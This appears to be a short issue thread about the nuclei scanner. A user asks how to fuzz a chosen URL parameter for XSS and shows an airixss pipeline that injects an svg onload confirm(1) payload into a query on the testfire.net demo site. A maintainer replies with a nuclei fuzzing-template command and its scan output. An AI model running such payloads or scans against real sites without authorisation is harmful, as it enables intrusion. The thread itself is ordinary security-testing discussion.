Param Scan XSS,SSTI vb

[secfb]

Can't we try xss vulnerability on a parameter we want in nuclei? airixss=> it checks if confirm(1) is in the result. Does Nucleli have such a feature?

echo "http://testfire.net/search.jsp?query=test"|qsreplace -a|sort -u|grep '='|qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"

Vulnerable - http://testfire.net/search.jsp?query=%22%3E%3Csvg+onload%3Dconfirm%281%29%3E

[ehsandeep]

@secfb, it's already possible and working; not sure if this is what you mean.

echo http://testfire.net/search.jsp?query=test | nuclei -t fuzzing-templates/ -tags xss

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.8.1

		projectdiscovery.io

[INF] Using Nuclei Engine 2.8.1 (latest)
[INF] Using Nuclei Templates 9.3.0 (latest)
[INF] Templates added in last update: 70
[INF] Templates loaded for scan: 1
[INF] Targets loaded for scan: 1
[reflected-xss] [http] [medium] http://testfire.net/search.jsp?query=test%27%22%3E%3C91143

You can update the payload https://github.com/projectdiscovery/fuzzing-templates/blob/main/xss/reflected-xss.yaml#L19 as you like for a custom check.